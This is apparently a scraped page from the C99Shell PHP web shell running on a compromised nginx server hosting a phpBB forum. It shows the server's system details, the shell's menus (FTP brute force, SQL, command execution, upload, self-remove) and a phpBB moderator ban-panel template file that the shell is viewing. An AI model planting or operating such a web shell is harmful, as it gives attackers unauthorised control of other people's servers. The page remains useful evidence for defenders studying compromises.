!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.23.4. PHP/5.6.40-65+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux foro-restaurado-2 5.15.0-1040-oracle #46-Ubuntu SMP Fri Jul 14 21:47:21 UTC 2023
aarch64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/nginx/html/phpbb3/cache2/   drwxrwxr-x
Free 83.35 GB of 96.73 GB (86.17%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     tpl_prosilver_mcp_ban.html.php (9.57 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php if (!defined('IN_PHPBB')) exit; $this->_tpl_include('mcp_header.html'); ?>

<script type="text/javascript">
// <![CDATA[

    var ban_length = new Array();
        ban_length[-1] = '';
    <?php $_ban_length_count = (isset($this->_tpldata['ban_length'])) ? sizeof($this->_tpldata['ban_length']) : 0;if ($_ban_length_count) {for ($_ban_length_i 0$_ban_length_i $_ban_length_count; ++$_ban_length_i){$_ban_length_val = &$this->_tpldata['ban_length'][$_ban_length_i]; ?>
        ban_length['<?php echo $_ban_length_val['BAN_ID']; ?>'] = '<?php echo $_ban_length_val['A_LENGTH']; ?>';
    <?php }} ?>

    var ban_reason = new Array();
        ban_reason[-1] = '';
    <?php $_ban_reason_count = (isset($this->_tpldata['ban_reason'])) ? sizeof($this->_tpldata['ban_reason']) : 0;if ($_ban_reason_count) {for ($_ban_reason_i 0$_ban_reason_i $_ban_reason_count; ++$_ban_reason_i){$_ban_reason_val = &$this->_tpldata['ban_reason'][$_ban_reason_i]; ?>
        ban_reason['<?php echo $_ban_reason_val['BAN_ID']; ?>'] = '<?php echo $_ban_reason_val['A_REASON']; ?>';
    <?php }} ?>

    var ban_give_reason = new Array();
        ban_give_reason[-1] = '';
    <?php $_ban_give_reason_count = (isset($this->_tpldata['ban_give_reason'])) ? sizeof($this->_tpldata['ban_give_reason']) : 0;if ($_ban_give_reason_count) {for ($_ban_give_reason_i 0$_ban_give_reason_i $_ban_give_reason_count; ++$_ban_give_reason_i){$_ban_give_reason_val = &$this->_tpldata['ban_give_reason'][$_ban_give_reason_i]; ?>
        ban_give_reason['<?php echo $_ban_give_reason_val['BAN_ID']; ?>'] = '<?php echo $_ban_give_reason_val['A_REASON']; ?>';
    <?php }} ?>

    function display_details(option)
    {
        document.getElementById('unbangivereason').innerHTML = ban_give_reason[option];
        document.getElementById('unbanreason').innerHTML = ban_reason[option];
        document.getElementById('unbanlength').innerHTML = ban_length[option];
    }

// ]]>
</script>

<form id="mcp_ban" method="post" action="<?php echo (isset($this->_rootref['U_ACTION'])) ? $this->_rootref['U_ACTION'] : ''?>">

<h2><?php echo ((isset($this->_rootref['L_TITLE'])) ? $this->_rootref['L_TITLE'] : ((isset($user->lang['TITLE'])) ? $user->lang['TITLE'] : '{ TITLE }')); ?></h2>

<div class="panel">
    <div class="inner"><span class="corners-top"><span></span></span>

    <h3><?php echo ((isset($this->_rootref['L_TITLE'])) ? $this->_rootref['L_TITLE'] : ((isset($user->lang['TITLE'])) ? $user->lang['TITLE'] : '{ TITLE }')); ?></h3>
    <p><?php echo ((isset($this->_rootref['L_EXPLAIN'])) ? $this->_rootref['L_EXPLAIN'] : ((isset($user->lang['EXPLAIN'])) ? $user->lang['EXPLAIN'] : '{ EXPLAIN }')); ?></p>

    <fieldset>
    <dl>
        <dt><label for="ban"><?php echo ((isset($this->_rootref['L_BAN_CELL'])) ? $this->_rootref['L_BAN_CELL'] : ((isset($user->lang['BAN_CELL'])) ? $user->lang['BAN_CELL'] : '{ BAN_CELL }')); ?>:</label></dt>
        <dd><label for="ban"><textarea name="ban" id="ban" class="inputbox" cols="40" rows="3"><?php echo (isset($this->_rootref['BAN_QUANTIFIER'])) ? $this->_rootref['BAN_QUANTIFIER'] : ''?></textarea></label></dd>
        <?php if ($this->_rootref['S_USERNAME_BAN']) {  ?><dd><strong><a href="<?php echo (isset($this->_rootref['U_FIND_USERNAME'])) ? $this->_rootref['U_FIND_USERNAME'] : ''?>" onclick="find_username(this.href); return false;"><?php echo ((isset($this->_rootref['L_FIND_USERNAME'])) ? $this->_rootref['L_FIND_USERNAME'] : ((isset($user->lang['FIND_USERNAME'])) ? $user->lang['FIND_USERNAME'] : '{ FIND_USERNAME }')); ?></a></strong></dd><?php ?>
    </dl>
    <dl>
        <dt><label for="banlength"><?php echo ((isset($this->_rootref['L_BAN_LENGTH'])) ? $this->_rootref['L_BAN_LENGTH'] : ((isset($user->lang['BAN_LENGTH'])) ? $user->lang['BAN_LENGTH'] : '{ BAN_LENGTH }')); ?>:</label></dt>
        <dd><label for="banlength"><select name="banlength" id="banlength" onchange="if(this.value==-1){document.getElementById('banlengthother').style.display = 'block';}else{document.getElementById('banlengthother').style.display='none';}"><?php echo (isset($this->_rootref['S_BAN_END_OPTIONS'])) ? $this->_rootref['S_BAN_END_OPTIONS'] : ''?></select></label></dd>
        <dd id="banlengthother" style="display: none;"><label><input type="text" name="banlengthother" class="inputbox" /><br /><span><?php echo ((isset($this->_rootref['L_YEAR_MONTH_DAY'])) ? $this->_rootref['L_YEAR_MONTH_DAY'] : ((isset($user->lang['YEAR_MONTH_DAY'])) ? $user->lang['YEAR_MONTH_DAY'] : '{ YEAR_MONTH_DAY }')); ?></span></label></dd>
    </dl>
    <dl>
        <dt><label for="banreason"><?php echo ((isset($this->_rootref['L_BAN_REASON'])) ? $this->_rootref['L_BAN_REASON'] : ((isset($user->lang['BAN_REASON'])) ? $user->lang['BAN_REASON'] : '{ BAN_REASON }')); ?>:</label></dt>
        <dd><input name="banreason" id="banreason" type="text" class="inputbox" maxlength="255" /></dd>
    </dl>
    <dl>
        <dt><label for="bangivereason"><?php echo ((isset($this->_rootref['L_BAN_GIVE_REASON'])) ? $this->_rootref['L_BAN_GIVE_REASON'] : ((isset($user->lang['BAN_GIVE_REASON'])) ? $user->lang['BAN_GIVE_REASON'] : '{ BAN_GIVE_REASON }')); ?>:</label></dt>
        <dd><input name="bangivereason" id="bangivereason" type="text" class="inputbox" maxlength="255" /></dd>
    </dl>

    <hr />

    <dl>
        <dt><label for="banexclude0"><?php echo ((isset($this->_rootref['L_BAN_EXCLUDE'])) ? $this->_rootref['L_BAN_EXCLUDE'] : ((isset($user->lang['BAN_EXCLUDE'])) ? $user->lang['BAN_EXCLUDE'] : '{ BAN_EXCLUDE }')); ?>:</label><br /><span><?php echo ((isset($this->_rootref['L_BAN_EXCLUDE_EXPLAIN'])) ? $this->_rootref['L_BAN_EXCLUDE_EXPLAIN'] : ((isset($user->lang['BAN_EXCLUDE_EXPLAIN'])) ? $user->lang['BAN_EXCLUDE_EXPLAIN'] : '{ BAN_EXCLUDE_EXPLAIN }')); ?></span></dt>
        <dd>
            <label for="banexclude1"><input type="radio" name="banexclude" id="banexclude1" value="1" /> <?php echo ((isset($this->_rootref['L_YES'])) ? $this->_rootref['L_YES'] : ((isset($user->lang['YES'])) ? $user->lang['YES'] : '{ YES }')); ?></label> 
            <label for="banexclude0"><input type="radio" name="banexclude" id="banexclude0" value="0" checked="checked" /> <?php echo ((isset($this->_rootref['L_NO'])) ? $this->_rootref['L_NO'] : ((isset($user->lang['NO'])) ? $user->lang['NO'] : '{ NO }')); ?></label>
        </dd>
    </dl>
    </fieldset>

    <span class="corners-bottom"><span></span></span></div>
</div>

<fieldset class="submit-buttons">
    <?php echo (isset($this->_rootref['S_HIDDEN_FIELDS'])) ? $this->_rootref['S_HIDDEN_FIELDS'] : ''?><input type="reset" value="<?php echo ((isset($this->_rootref['L_RESET'])) ? $this->_rootref['L_RESET'] : ((isset($user->lang['RESET'])) ? $user->lang['RESET'] : '{ RESET }')); ?>" name="reset" class="button2" />&nbsp; 
    <input type="submit" name="bansubmit" value="<?php echo ((isset($this->_rootref['L_SUBMIT'])) ? $this->_rootref['L_SUBMIT'] : ((isset($user->lang['SUBMIT'])) ? $user->lang['SUBMIT'] : '{ SUBMIT }')); ?>" class="button1" />
    <?php echo (isset($this->_rootref['S_FORM_TOKEN'])) ? $this->_rootref['S_FORM_TOKEN'] : ''?>
</fieldset>

<div class="panel">
    <div class="inner"><span class="corners-top"><span></span></span>

    <h3><?php echo ((isset($this->_rootref['L_UNBAN_TITLE'])) ? $this->_rootref['L_UNBAN_TITLE'] : ((isset($user->lang['UNBAN_TITLE'])) ? $user->lang['UNBAN_TITLE'] : '{ UNBAN_TITLE }')); ?></h3>
    <p><?php echo ((isset($this->_rootref['L_UNBAN_EXPLAIN'])) ? $this->_rootref['L_UNBAN_EXPLAIN'] : ((isset($user->lang['UNBAN_EXPLAIN'])) ? $user->lang['UNBAN_EXPLAIN'] : '{ UNBAN_EXPLAIN }')); ?></p>

    <?php if ($this->_rootref['S_BANNED_OPTIONS']) {  ?>
        <fieldset>
        <dl>
            <dt><label for="unban"><?php echo ((isset($this->_rootref['L_BAN_CELL'])) ? $this->_rootref['L_BAN_CELL'] : ((isset($user->lang['BAN_CELL'])) ? $user->lang['BAN_CELL'] : '{ BAN_CELL }')); ?>:</label></dt>
            <dd><select name="unban[]" id="unban" multiple="multiple" size="5" onchange="if (this.selectedIndex != -1) {display_details(this.options[this.selectedIndex].value);}"><?php echo (isset($this->_rootref['BANNED_OPTIONS'])) ? $this->_rootref['BANNED_OPTIONS'] : ''?></select></dd>
        </dl>
        <dl>
            <dt><?php echo ((isset($this->_rootref['L_BAN_LENGTH'])) ? $this->_rootref['L_BAN_LENGTH'] : ((isset($user->lang['BAN_LENGTH'])) ? $user->lang['BAN_LENGTH'] : '{ BAN_LENGTH }')); ?>:</dt>
            <dd><strong id="unbanlength"></strong></dd>
        </dl>
        <dl>
            <dt><?php echo ((isset($this->_rootref['L_BAN_REASON'])) ? $this->_rootref['L_BAN_REASON'] : ((isset($user->lang['BAN_REASON'])) ? $user->lang['BAN_REASON'] : '{ BAN_REASON }')); ?>:</dt>
            <dd><strong id="unbanreason"></strong></dd>
        </dl>
        <dl>
            <dt><?php echo ((isset($this->_rootref['L_BAN_GIVE_REASON'])) ? $this->_rootref['L_BAN_GIVE_REASON'] : ((isset($user->lang['BAN_GIVE_REASON'])) ? $user->lang['BAN_GIVE_REASON'] : '{ BAN_GIVE_REASON }')); ?>:</dt>
            <dd><strong id="unbangivereason"></strong></dd>
        </dl>
        </fieldset>

        <span class="corners-bottom"><span></span></span></div>
    </div>

    <fieldset class="submit-buttons">
        <?php echo (isset($this->_rootref['S_HIDDEN_FIELDS'])) ? $this->_rootref['S_HIDDEN_FIELDS'] : ''?><input type="reset" value="<?php echo ((isset($this->_rootref['L_RESET'])) ? $this->_rootref['L_RESET'] : ((isset($user->lang['RESET'])) ? $user->lang['RESET'] : '{ RESET }')); ?>" name="reset" class="button2" />&nbsp; 
        <input type="submit" name="unbansubmit" value="<?php echo ((isset($this->_rootref['L_SUBMIT'])) ? $this->_rootref['L_SUBMIT'] : ((isset($user->lang['SUBMIT'])) ? $user->lang['SUBMIT'] : '{ SUBMIT }')); ?>" class="button1" />
    </fieldset>

    <?php } else { ?>

        <p><strong><?php echo ((isset($this->_rootref['L_NO_BAN_CELL'])) ? $this->_rootref['L_NO_BAN_CELL'] : ((isset($user->lang['NO_BAN_CELL'])) ? $user->lang['NO_BAN_CELL'] : '{ NO_BAN_CELL }')); ?></strong></p>

        <span class="corners-bottom"><span></span></span></div>
    </div>

    <?php ?>
</form>

<?php $this->_tpl_include('mcp_footer.html'); ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by HackingTool | HackingTool | Generation time: 0.0039 ]--